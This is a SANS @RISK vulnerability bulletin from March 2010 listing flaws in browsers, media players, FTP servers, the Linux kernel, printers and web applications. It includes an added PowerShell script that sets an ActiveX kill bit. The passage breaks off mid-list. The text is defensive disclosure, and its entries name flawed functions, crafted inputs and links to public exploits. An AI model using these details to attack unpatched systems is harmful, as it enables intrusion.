
@RISK: The Consensus Security Vulnerability Alert

Volume: IX, Issue: 13
March 25, 2010

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

Platform                                  Number of Updates and Vulnerabilities
----------------------------------------- -------------------------------------
Third Party Windows Apps                   8
Linux                                      4
Cross Platform                            31 (#1, #2, #3, #4, #5, #6)
Web Application - Cross Site Scripting    13
Web Application - SQL Injection           29
Web Application                           33

************************* Sponsored By SANS *********************

What are the best practices in grid security? What are the most critical vulnerabilities in power systems and other elements of the critical infrastructure? Hear about these important findings at the 2010 SCADA & Process Control Summit. Also register for Pre and Post Summit courses including no-cost training sponsored by DHS on March 31. SANS Process Control and SCADA Summit March 29-30 - Orlando.

http://www.sans.org/info/57264

******************************************************************

TRAINING UPDATE

-- SANS Northern Virginia Bootcamp 2010, April 6-13. Bonus evening presentations include Safe Surfing: How to Surf the Net Without Getting PWND

http://www.sans.org/reston-2010/

-- SANS Security West 2010, San Diego, May 7-15, 2010

23 courses. Bonus evening presentations include Killer Bee: Exploiting ZigBee and the Kinetic World

http://www.sans.org/security-west-2010/

-- SANSFIRE 2010, Baltimore, June 6-14, 2010. 38 courses. Bonus evening presentations include Software Security Street Fighting Style and The Verizon Data Breach Investigations Report

http://www.sans.org/sansfire-2010/

-- SANSFIRE Rocky Mountain 2010, Denver, July 12-17, 2010. 8 courses. Bonus evening presentations include Hiding in Plain Sight: Forensic Techniques to Counter the Advanced Persistent Threat

http://www.sans.org/rocky-mountain-2010/

-- SANS Boston 2010, June 6-14, 2010. 11 courses

http://www.sans.org/boston-2010/

Looking for training in your own community? http://sans.org/community/

Save on On-Demand training (30 full courses) - See samples at http://www.sans.org/ondemand/spring09.php

Plus Dubai, Geneva, Toronto, Singapore and Amsterdam all in the next 90 days.

For a list of all upcoming events, on-line and live: http://www.sans.org/index.php

*************************************************************************

Table Of Contents

PART I -- Critical Vulnerabilities
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
  Third Party Windows Apps
  Linux
  Cross Platform
  Web Application - Cross Site Scripting
  Web Application - SQL Injection
  Web Application

PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rohan Kotian at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (2) HIGH: Google Chrome Multiple Vulnerabilities
  • Affected:
    • Google Chrome 4.0.249.89
    • Google Chrome 4.0.249.78
  • Description: Google Chrome, a web browser developed by Google, is the fourth most popular web browser with a 2.59% usage share. Multiple vulnerabilities have been identified in Google Chrome that attackers can use to bypass security restrictions or compromise a vulnerable system. The first issue is a race condition and pointer error in the sandbox. The second issue can be used to delete persisted metadata. The third issue is a memory error in the handling of specially crafted SVG files. The fourth issue is an integer overflow in the handling of WebKit JavaScript objects. The fifth issue allows the HTTP authentication dialog to be spoofed with the help of long subdomains. The sixth issue, if exploited correctly, might allow the download warning dialog to be bypassed. The last issue is an unspecified error that might allow the cross-origin policy to be bypassed. Full technical details are publicly available via source code analysis.

  • Status: Vendor confirmed, updates available.

  • References:

  • (4) MODERATE: Computer Associates ARCserve Backup JRE Multiple Vulnerabilities
  • Affected:
    • Computer Associates ARCserve Backup 12.5
    • Computer Associates ARCserve Backup 12.0
    • Computer Associates ARCserve Backup 11.5
  • Description: Computer Associates ARCserve Backup is a popular enterprise backup solution that provides data deduplication and resource management reporting. Multiple vulnerabilities have been reported in Computer Associates ARCserve Backup. These issues are caused by unspecified errors in the version of the JRE that is shipped with ARCserve Backup; that JRE version has also reached end of life, so it will receive no further security fixes of its own. No further technical details for the vulnerabilities are publicly available.

  • Status: Vendor confirmed, updates available.

  • References:

  • (5) MODERATE: Liquid XML Studio ActiveX Buffer Overflow Vulnerability
  • Affected:
    • Liquid XML Studio 2010 versions 8.061970 and prior
  • Description: Liquid XML Studio, a product of Liquid Technologies, is a graphical XML Schema editor for Windows used by many users around the globe and especially popular in schools and universities. A buffer overflow vulnerability has been reported in an ActiveX control shipped with Liquid XML Studio 2010; a specially crafted web page that instantiates this control can trigger it. The specific flaw is a boundary error in the "LtXmlComHelp8.dll" module, and an attacker can exploit it by passing an overly long argument to the "OpenFile()" method. Successful exploitation might allow an attacker to execute arbitrary code in the context of the browser hosting the control, i.e. with the privileges of the user who visited the page. Full technical details for the vulnerability are publicly available.

  • Status: Vendor not confirmed, no updates available. Users can mitigate the impact of this vulnerability by disabling the vulnerable control via Microsoft's kill bit mechanism for CLSID {E68E401C-7DB0-4F3A-88E1-159882468A79}. Note that this may affect normal application functionality.

  • References:
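The kill bit mitigation above, as an added example that is not part of the original bulletin and not Liquid Technologies' own guidance: Internet Explorer refuses to instantiate any control whose CLSID carries the kill bit (bit 0x400 of the "Compatibility Flags" value under the "ActiveX Compatibility" key, per Microsoft KB 240797). The CLSID is the one from the bulletin; the script is assumed to run from an elevated PowerShell prompt on the affected workstation.

```powershell
# Added example: set the IE kill bit for the Liquid XML Studio helper control
# (CLSID from the @RISK entry above). Requires an elevated prompt.
$clsid = '{E68E401C-7DB0-4F3A-88E1-159882468A79}'
$killBit = 0x400    # documented kill-bit flag (KB 240797)

$keys = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid",
    # 32-bit IE on 64-bit Windows reads the WOW6432Node view; on 32-bit
    # Windows this key is simply unused.
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
)

foreach ($key in $keys) {
    if (-not (Test-Path $key)) {
        New-Item -Path $key -Force | Out-Null
    }
    # OR the kill bit into whatever flags are already present so that other
    # compatibility settings for the control are preserved.
    $current = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                -ErrorAction SilentlyContinue).'Compatibility Flags'
    $new = [int]($current -bor $killBit)
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $new -Type DWord
}

# Verification: report the flag state in both registry views.
foreach ($key in $keys) {
    $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags').'Compatibility Flags'
    $state = if ($flags -band $killBit) { 'SET' } else { 'NOT set' }
    '{0}: Compatibility Flags = 0x{1:X} (kill bit {2})' -f $key, $flags, $state
}
```

The kill bit only stops Internet Explorer (and other hosts that honour the flag) from loading the control from web content; it does not remove LtXmlComHelp8.dll from the system, and any script-free use of the control by Liquid XML Studio itself may stop working, which is the functionality impact the Status line warns about. Re-run the verification loop after a vendor update to confirm the bit has not been silently cleared by the installer.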
  • (6) MODERATE: VariCAD Products Buffer Overflow Vulnerability
  • Affected:
    • VariCAD version 2.05 and prior
    • VariCAD Viewer version 2.05 and prior
  • Description: VariCAD is a computer-aided design (CAD) program offering 3D modeling and 2D drafting. A buffer overflow vulnerability has been reported in VariCAD and VariCAD Viewer; a specially crafted DWB file can be used to trigger it. The issue is caused by a boundary error in the way the affected applications process DWB files. Successful exploitation might allow an attacker to execute arbitrary code in the context of the affected application. Full technical details for the vulnerability are publicly available via a public proof-of-concept.

  • Status: Vendor not confirmed, no updates available.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 13, 2010

This list is compiled by Qualys (www.qualys.com) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 8386 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.
______________________________________________________________________


  • 10.13.1 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Miranda IM "Use TLS" Configuration Option Security Bypass
  • Description: Miranda IM is an open source instant messenger for Windows. The application is exposed to a security bypass issue because it fails to properly enforce its "Use TLS" configuration option, an expected security feature. Miranda IM version 0.8.16 is affected.
  • Ref: http://code.google.com/p/miranda/issues/detail?id=152

  • 10.13.2 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Microsoft Windows Media Player AVI File Colorspace Conversion Remote Memory Corruption
  • Description: Microsoft Windows Media Player is a multimedia application available for the Windows operating system. The application is exposed to a remote memory corruption issue when handling crafted AVI files. Specifically, the "quartz.dll" library fails to handle color space conversions between bitmap data. Windows Media Player version 11 is affected.
  • Ref: http://www.securityfocus.com/bid/38790

  • 10.13.3 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: myMP3-Player ".m3u" File Buffer Overflow
  • Description: myMP3-Player is a multimedia player available for Microsoft Windows. The application is exposed to a buffer overflow issue because it fails to perform adequate checks on user-supplied input. Specifically, this issue occurs when opening a specially crafted ".m3u" file. myMP3-Player version 3.0 is affected.
  • Ref: http://www.securityfocus.com/bid/38835

  • 10.13.4 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: ZippHo ".zip" File Stack-Based Buffer Overflow Vulnerability
  • Description: ZippHo is a file archiving application available for Microsoft Windows. The application is exposed to a stack-based buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data. This issue occurs when the application processes a specially crafted ".zip" file. ZippHo version 3.0.6 is affected.
  • Ref: http://www.securityfocus.com/bid/38836

  • 10.13.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Xilisoft Video Converter Wizard ".yuv" File Stack Buffer Overflow
  • Description: Xilisoft Video Converter is a media file converter for Microsoft Windows. Xilisoft Video Converter Wizard is exposed to a stack-based buffer overflow issue because it fails to perform adequate checks on user-supplied input. Specifically, the issue occurs when parsing a specially crafted ".yuv" file.
  • Ref: http://www.securityfocus.com/bid/38854

  • 10.13.6 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Ken Ward's Zipper "filename" Stack-Based Buffer Overflow
  • Description: Ken Ward's Zipper is a file-archiving application available for Microsoft Windows. The application is exposed to a stack-based buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data. This issue occurs when the application processes a ".zip" archive that contains a file with a specially crafted filename. Ken Ward's Zipper version 4.60.019 is affected.
  • Ref: http://www.abysssec.com/blog/2010/03/ken-ward-zipper-stack-bof-0day-a-not-so-typical-seh-exploit/

  • 10.13.7 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: freeSSHd SSH2 Connection Data Remote Buffer Overflow
  • Description: freeSSHd is an SSH server for Microsoft Windows. freeSSHd is exposed to a buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data. This issue occurs when handling crafted SSH2 connection data. freeSSHd version 1.2.4 is affected.
  • Ref: http://www.securityfocus.com/bid/38887

  • 10.13.8 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Donar Player ".wma" File Denial of Service
  • Description: Donar Player is a multimedia application available for the Windows operating system. The application is exposed to a denial of service issue when processing ".wma" files containing an excessively long string. Donar Player version 2.2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/38902

  • 10.13.9 - CVE: Not Available
  • Platform: Linux
  • Title: Linux Kernel DRBD kernel module Security Bypass
  • Description: The Linux kernel is exposed to a security bypass issue that affects the DRBD kernel module and allows local attackers to bypass "CAP_SYS_ADMIN" access restrictions and send netlink packets. Linux kernel versions 2.6.x are affected.
  • Ref: http://www.debian.org/security/2010/dsa-2015

  • 10.13.10 - CVE: CVE-2010-0008
  • Platform: Linux
  • Title: Linux Kernel "sctp_rcv_ootb()" Remote Denial of Service
  • Description: The Linux kernel is exposed to a remote denial of service issue because it fails to properly handle user-supplied input. This issue occurs because of inadequate checks in the "sctp_rcv_ootb()" function. Linux kernel versions prior to 2.6.23 are affected.
  • Ref: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-0008

  • 10.13.11 - CVE: CVE-2009-4271
  • Platform: Linux
  • Title: Linux Kernel Virtual Dynamically-linked Shared Object Access Local Denial of Service
  • Description: The Linux kernel is exposed to a local denial of service issue. Specifically, a 32-bit user process can cause the kernel to crash by accessing a VDSO (Virtual Dynamically-linked Shared Object) page after restricting access to it via an "mprotect()" call. Linux kernel versions 2.6.9 through 2.6.17 are affected.
  • Ref: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2009-4271

  • 10.13.12 - CVE: Not Available
  • Platform: Linux
  • Title: Linux Kernel Bluetooth Sysfs File Local Privilege Escalation
  • Description: The Linux kernel is exposed to a privilege escalation issue affecting sysfs files associated with Bluetooth sockets. Specifically, opening a large number of Bluetooth sockets may result in data being written to unintended memory pages. Linux kernel versions prior to 2.6.34-rc2-git1 are affected.
  • Ref: https://bugzilla.redhat.com/show_bug.cgi?id=576018

  • 10.13.13 - CVE: Not Available
  • Platform: Cross Platform
  • Title: BarnOwl "owl_message_get_cc_without_recipient()" Heap Buffer Overflow
  • Description: BarnOwl is an instant messaging client. BarnOwl is exposed to a heap-based buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data. This issue occurs in the "owl_message_get_cc_without_recipient()" function when handling a specially crafted "CC:" string. BarnOwl versions prior to 1.5.1 are affected.
  • Ref: http://barnowl.mit.edu/wiki/barnowl-1.5.1-announce

  • 10.13.14 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Transmission Magnet Link Remote Buffer Overflow
  • Description: Transmission is a multiplatform BitTorrent client. Transmission is exposed to a remote stack-based buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data. This issue occurs when handling a specially crafted magnet link. Transmission versions prior to 1.9.2 are affected.
  • Ref: http://trac.transmissionbt.com/wiki/Changes

  • 10.13.15 - CVE: Not Available
  • Platform: Cross Platform
  • Title: VariCAD 2010 "DWB" File Remote Buffer Overflow
  • Description: VariCAD 2010 and VariCAD Viewer are CAD applications available for Microsoft Windows and Linux. The applications are exposed to a remote buffer overflow issue because they fail to perform adequate checks on user-supplied input. VariCAD version 2010 2.05 and VariCAD Viewer are affected.
  • Ref: http://www.securityfocus.com/bid/38815

  • 10.13.16 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Embedthis Appweb "waitCallback()" Remote Denial of Service
  • Description: Appweb is an embedded HTTP server application. The server is exposed to a denial of service issue when handling certain requests. Specifically, the "waitCallback()" function in src/mpr/mprLib.c is affected when multiple malformed requests are sent to the server. Appweb version 3.1.2 is affected.
  • Ref: http://hg.embedthis.com/appweb/log/1720

  • 10.13.17 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Google Chrome prior to 4.1.249.1036 Multiple Security Vulnerabilities
  • Description: Google Chrome is a web browser for multiple platforms. The browser is exposed to multiple issues. Attackers can exploit these issues to obtain sensitive information, execute arbitrary code in the context of the browser, bypass certain security restrictions and carry out other attacks. Chrome versions prior to 4.1.249.1036 are affected.
  • Ref: http://googlechromereleases.blogspot.com/2010/03/stable-channel-update.html

  • 10.13.18 - CVE: CVE-2009-3385
  • Platform: Cross Platform
  • Title: Mozilla SeaMonkey Scriptable Plugin Content Security Bypass
  • Description: Mozilla SeaMonkey is a suite of applications that includes a browser and an email client. Mozilla SeaMonkey is exposed to a security bypass issue because it allows scriptable plugin content, such as a Flash object, to be loaded and executed by embedding it in an "iframe" tag inside a message. Mozilla SeaMonkey versions prior to 1.1.19 are affected.
  • Ref: http://www.mozilla.org/security/announce/2010/mfsa2010-06.html

  • 10.13.19 - CVE: CVE-2010-0161, CVE-2010-0163
  • Platform: Cross Platform
  • Title: Mozilla Thunderbird Multiple Denial of Service Vulnerabilities
  • Description: Mozilla Thunderbird is an email client; SeaMonkey is a suite of applications that includes a browser and an email client. Mozilla Thunderbird is exposed to multiple denial of service issues. Mozilla Thunderbird versions 2.0.0.23 and earlier are affected. SeaMonkey versions prior to 1.1.19 are affected.
  • Ref: http://www.mozilla.org/security/announce/2010/mfsa2010-07.html

  • 10.13.20 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM DB2 Content Manager Web Services Unspecified
  • Description: IBM DB2 Content Manager is a content management product available for multiple platforms. The application is exposed to an unspecified issue that affects the single sign-on component of Content Manager Web Services. IBM DB2 Content Manager versions prior to 8.3 Fix Pack 13 are affected.
  • Ref: http://www-01.ibm.com/support/docview.wss?uid=swg27018205

  • 10.13.21 - CVE: Not Available
  • Platform: Cross Platform
  • Title: MPlayer WAV File Remote Null Pointer Dereference
  • Description: MPlayer is a media player application available for multiple platforms. MPlayer is exposed to a remote NULL pointer dereference issue when processing a specially crafted WAV file because the application fails to perform adequate boundary checks on user-supplied input. MPlayer version 1.0rc3 is affected.
  • Ref: http://www.securityfocus.com/bid/38837

  • 10.13.22 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Citrix Web Interface Source Code Information Disclosure
  • Description: Citrix Web Interface is an application deployment system that provides users with access to Presentation Server applications through a standard browser. Citrix Web Interface is exposed to an issue that lets attackers access certain source code found in the "ClientScript" folder. Citrix Web Interface version 4.5.1 is affected.
  • Ref: http://www.securityfocus.com/bid/38838

  • 10.13.23 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Computer Associates ARCserve Backup JRE Multiple Remote Vulnerabilities
  • Description: Computer Associates ARCserve Backup products provide backup and restore protection. Computer Associates ARCserve Backup is exposed to multiple unspecified issues that exist in the Java Runtime Environment included with the application.
  • Ref: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=231977

  • 10.13.24 - CVE: Not Available
  • Platform: Cross Platform
  • Title: eDisplay Personal FTP Server "USER" Command Remote Memory Corruption
  • Description: eDisplay Personal FTP Server is an FTP server application. The application is exposed to a remote memory corruption issue because the application fails to perform adequate boundary checks on user-supplied input. Specifically the issue occurs when processing a specially crafted "USER" command. eDisplay Personal FTP Server version 1.0.0 is affected.
  • Ref: http://www.securityfocus.com/bid/38855

  • 10.13.25 - CVE: Not Available
  • Platform: Cross Platform
  • Title: eDisplay Personal FTP server Multiple Commands Remote Buffer Overflow Vulnerabilities
  • Description: eDisplay Personal FTP server is an FTP server for Microsoft Windows. The server is exposed to multiple remote buffer overflow issues because it fails to perform adequate boundary checks on user-supplied data. eDisplay Personal FTP server version 1.0.0 is affected.
  • Ref: http://www.securityfocus.com/bid/38860

  • 10.13.26 - CVE: Not Available
  • Platform: Cross Platform
  • Title: KDE KSysguard ".sgrd" File Processing Arbitrary Command Execution
  • Description: KDE (K Desktop Environment) is a desktop environment for Unix-like systems. KDE is exposed to an arbitrary command injection issue because the KSysguard application fails to properly handle malicious ".sgrd" files. KDE versions 4.4.1 and earlier are affected.
  • Ref: http://www.backtrack.it/~emgent/exploits/20100320_Ksysguard_RCE_CAS.txt

  • 10.13.28 - CVE: Not Available
  • Platform: Cross Platform
  • Title: WordPress Password Protection Security Bypass
  • Description: WordPress is a web-based publishing application. The application is exposed to a security bypass issue because it fails to properly restrict access to certain content. Specifically, the password protection that can be applied to individual posts and pages can be bypassed. WordPress versions 2.9.2 and 2.0.11 are affected.
  • Ref: http://seclists.org/fulldisclosure/2010/Mar/361

  • 10.13.29 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Apple Safari Nested "object" Tag Remote Denial of Service
  • Description: Apple Safari is a web browser. Apple Safari is exposed to a remote denial of service issue. Specifically, the application may crash when processing a HTML document containing an excessive number of nested "object" tags. Safari version 4.0.5 for Windows is affected.
  • Ref: http://www.securityfocus.com/bid/38884

  • 10.13.30 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Opera Web Browser XSLT Cross-Domain Information Disclosure
  • Description: Opera Web Browser is a browser that runs on multiple operating systems. The application is exposed to an information disclosure issue. Specifically, when the browser processes certain XSLT constructs it may disclose contents of the cached versions of any Web page that was previously visited. Opera Web Browser version 10.50 is affected.
  • Ref: http://www.opera.com/support/kb/view/949/

  • 10.13.31 - CVE: Not Available
  • Platform: Cross Platform
  • Title: GraphicsMagick File Handling Remote Integer Underflow
  • Description: GraphicsMagick is an image processing application available for multiple platforms. GraphicsMagick is exposed to a remote integer underflow issue because it fails to sufficiently validate an integer value. The issue occurs when the application handles certain unspecified file formats or characters in file names. GraphicsMagick versions prior to 1.3.11 are affected.
  • Ref: http://sourceforge.net/mailarchive/message.php?msg_name=alpine.GSO.2.01.1002211622420.25017@freddy.simplesystems.org

  • 10.13.32 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Cafu Multiple Remote Vulnerabilities
  • Description: Cafu is a 3D environment engine for Linux and Windows. The server application is exposed to a remote format string issue because it fails to properly sanitize user-supplied input, and to a NULL pointer dereference: the server can be crashed by sending an incomplete "CS0_RemoteConsoleCommand" packet that omits the "password" field. Cafu versions 9.06 and prior are affected.
  • Ref: http://www.securityfocus.com/bid/38897

  • 10.13.33 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Crimson Editor ".cfg" File Stack Buffer Overflow
  • Description: Crimson Editor is a text editor application. Crimson Editor is exposed to a stack-based buffer overflow issue because it fails to perform adequate checks on user-supplied input. Specifically, the issue occurs when parsing a specially crafted ".cfg" file. Crimson Editor version 3.70 is affected.
  • Ref: http://www.securityfocus.com/bid/38900

  • 10.13.34 - CVE: CVE-2010-0619
  • Platform: Cross Platform
  • Title: Multiple Lexmark Laser Printers PJL Processing Remote Stack Buffer Overflow
  • Description: Lexmark manufactures multiple laser printer models. Multiple Lexmark laser printer models are exposed to a remote stack-based buffer overflow issue because they fail to perform adequate boundary checks on user-supplied data. This issue occurs when a device processes a specially crafted Printer Job Language (PJL) request that contains an invalid argument to the "PJL INQUIRE" command.
  • Ref: http://support.lexmark.com/index?page=content&id=TE84&locale=EN&userlocale=EN_US

  • 10.13.35 - CVE: CVE-2010-0628
  • Platform: Cross Platform
  • Title: MIT Kerberos "gss_accept_sec_context()" Denial Of Service
  • Description: MIT Kerberos is a suite of applications and libraries that implement the Kerberos network authentication protocol. MIT Kerberos is exposed to a remote denial of service issue that affects the "spnego_gss_accept_sec_context()" function in the "src/lib/gssapi/spnego/spnego_mech.c" source file when it processes an invalid packet at the beginning of the GSS-API protocol exchange. MIT Kerberos 1.7 releases prior to 1.7.2 and 1.8 releases prior to 1.8.1 are affected.
  • Ref: http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2010-002.txt

  • 10.13.36 - CVE: CVE-2010-0618
  • Platform: Cross Platform
  • Title: Multiple Lexmark Laser Printers FTP Service Remote Denial of Service
  • Description: Lexmark manufactures multiple laser printer models. Multiple Lexmark laser printers are exposed to a remote denial of service issue because they fail to properly implement flood protection to the FTP service.
  • Ref: http://support.lexmark.com/index?page=content&id=TE85&locale=EN&userlocale=EN_US

  • 10.13.37 - CVE: CVE-2009-2907
  • Platform: Cross Platform
  • Title: Multiple SpringSource Products Multiple HTML Injection Vulnerabilities
  • Description: SpringSource Hyperic HQ, tc Server, and Application Management Suite are infrastructure management applications. The applications are exposed to multiple HTML injection issues because they fail to sufficiently sanitize user-supplied input to the "description" field of unspecified scripts; additional, unspecified scripts and parameters are also vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/510293

  • 10.13.38 - CVE: CVE-2010-0164, CVE-2010-0165, CVE-2010-0166, CVE-2010-0167, CVE-2010-0168, CVE-2010-0169, CVE-2010-0170, CVE-2010-0171, CVE-2010-0172
  • Platform: Cross Platform
  • Title: Mozilla Firefox, Thunderbird and SeaMonkey MFSA 2010-09 through 2010-15 Multiple Vulnerabilities
  • Description: The Mozilla Foundation has released multiple advisories to address vulnerabilities in Firefox, Thunderbird and SeaMonkey. Attackers may use these vulnerabilities to crash the browser, execute arbitrary code, retrieve potentially sensitive information, bypass certain security restrictions, gain unauthorized access to resources and carry out cross-site scripting and cross-domain scripting attacks.
  • Ref: http://www.mozilla.org/security/announce/2010/mfsa2010-09.html

  • 10.13.39 - CVE: CVE-2010-0170
  • Platform: Cross Platform
  • Title: Mozilla Firefox "window.location" Same Origin Policy Security Bypass
  • Description: Mozilla Firefox is a web browser available for multiple platforms. A security bypass issue exists because the "window.location" object is an overridable JavaScript object. This may allow attackers to create a malicious website that would override the object and bypass certain security restrictions of plugins that use this object to determine the page origin and enforce access restrictions. Firefox version 3.6 is affected.
  • Ref: http://www.mozilla.org/security/announce/2010/mfsa2010-10.html

  • 10.13.40 - CVE: CVE-2010-0172
  • Platform: Cross Platform
  • Title: Mozilla Firefox Asynchronous HTTP Authorization Prompt Information Disclosure
  • Description: Mozilla Firefox is a web browser available for multiple platforms. Mozilla Firefox is exposed to an information disclosure issue. Specifically, this issue arises because the application does not attach an asynchronous HTTP authorization prompt to the correct browser window or tab, so a prompt raised by one site can appear over a page belonging to another. Firefox version 3.6 is affected.
  • Ref: http://www.mozilla.org/security/announce/2010/mfsa2010-15.html

  • 10.13.41 - CVE: CVE-2010-0164
  • Platform: Cross Platform
  • Title: Mozilla Firefox "multipart/x-mixed-replace" Image Remote Memory Corruption
  • Description: Mozilla Firefox is a browser available for various platforms. The application is exposed to a remote memory corruption issue that occurs due to a use-after-free error in the libpr0n image library. Specifically, a specially crafted animation with bits-per-pixel changes, received via the "multipart/x-mixed-replace" MIME type, may cause the browser to free and then reuse a memory pointer. Firefox version 3.6 is affected.
  • Ref: http://www.mozilla.org/security/announce/2010/mfsa2010-09.html

  • 10.13.42 - CVE: CVE-2010-0169
  • Platform: Cross Platform
  • Title: Mozilla Firefox Cached XUL Stylesheets Security Bypass
  • Description: Mozilla Firefox is a web browser available for multiple platforms. Mozilla Firefox is exposed to an issue that may allow attackers to modify browser settings. Specifically, this issue arises because stylesheets from remote XUL documents can be placed in the XUL cache.
  • Ref: https://bugzilla.mozilla.org/show_bug.cgi?id=535806

  • 10.13.43 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Serv-U Multiple Security Vulnerabilities
  • Description: Serv-U is a file server. Serv-U is exposed to multiple security issues. Attackers can exploit these issues to bypass certain security restrictions or crash the affected application. Serv-U versions prior to 9.4.0.0 are affected.
  • Ref: http://www.serv-u.com/releasenotes/

  • 10.13.44 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: TYPO3 Sellector.com Widget Integration Extension Unspecified Cross-Site Scripting
  • Description: Sellector.com Widget Integration ('chsellector') is an extension for the TYPO3 content manager. The extension is exposed to an unspecified cross-site scripting issue because it fails to properly sanitize user-supplied input. Sellector.com Widget Integration versions 0.1.1 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.45 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: TYPO3 Quixplorer Extension Unspecified Cross-Site Scripting
  • Description: Quixplorer (t3quixplorer) is an extension for the TYPO3 content manager. The extension is exposed to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Quixplorer versions 1.7.0 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.46 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: TYPO3 myDashboard (mydashboard) Extension Unspecified Cross-Site Scripting
  • Description: myDashboard is an extension for the TYPO3 content manager. The extension is exposed to an unspecified cross-site scripting issue because it fails to properly sanitize user-supplied input. myDashboard versions 0.1.13 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.47 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: TYPO3 UserTask Center, Recent Extension Unspecified Cross-Site Scripting
  • Description: UserTask Center, recent (taskcenter_recent) is an extension for the TYPO3 content manager. The extension is exposed to an unspecified cross-site scripting issue because it fails to properly sanitize user-supplied input. UserTask Center, recent versions 0.1.0 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.48 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: TYPO3 Reports Logfile View Extension Unspecified Cross-Site Scripting
  • Description: Reports Logfile View ('reports_logview') is an extension for the TYPO3 content manager. The extension is exposed to an unspecified cross-site scripting issue because it fails to properly sanitize user-supplied input. Reports Logfile View version 1.2.1 is affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/

  • 10.13.49 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: TYPO3 mm_forum Extension Unspecified Cross-Site Scripting
  • Description: mm_forum is an extension for the TYPO3 content manager. The extension is exposed to an unspecified cross-site scripting issue because it fails to properly sanitize user-supplied input. mm_forum versions 1.8.2 and earlier are affected.
  • Ref: http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-007/

  • 10.13.50 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: DotNetNuke Search Function Cross-Site Scripting
  • Description: DotNetNuke is an open source framework for creating and deploying websites. The application is exposed to a cross-site scripting issue because it fails to properly sanitize unspecified user-supplied input to the search function. DotNetNuke versions 5.0.0 through 5.2.3 are affected.
  • Ref: http://www.dotnetnuke.com/News/SecurityPolicy/securitybulletinno33/tabid/1522/Default.aspx

  • 10.13.51 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: PHPWind Multiple Cross-Site Scripting Vulnerabilities
  • Description: PHPWind is a web-based bulletin board application implemented in PHP. The application is vulnerable to multiple cross-site scripting issues due to insufficient sanitization of user-supplied input in many different parameters. PHPWind 6.0 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/38867

  • 10.13.52 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: WebMatic Multiple Cross-Site Scripting Vulnerabilities
  • Description: Valarsoft WebMatic is an application that allows users to develop websites. It is exposed to multiple cross-site scripting issues due to insufficient sanitization of user-supplied input. WebMatic versions 3.0.3 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/38874/info

  • 10.13.53 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: IBM Lotus Notes "names.nsf" Cross Site Scripting
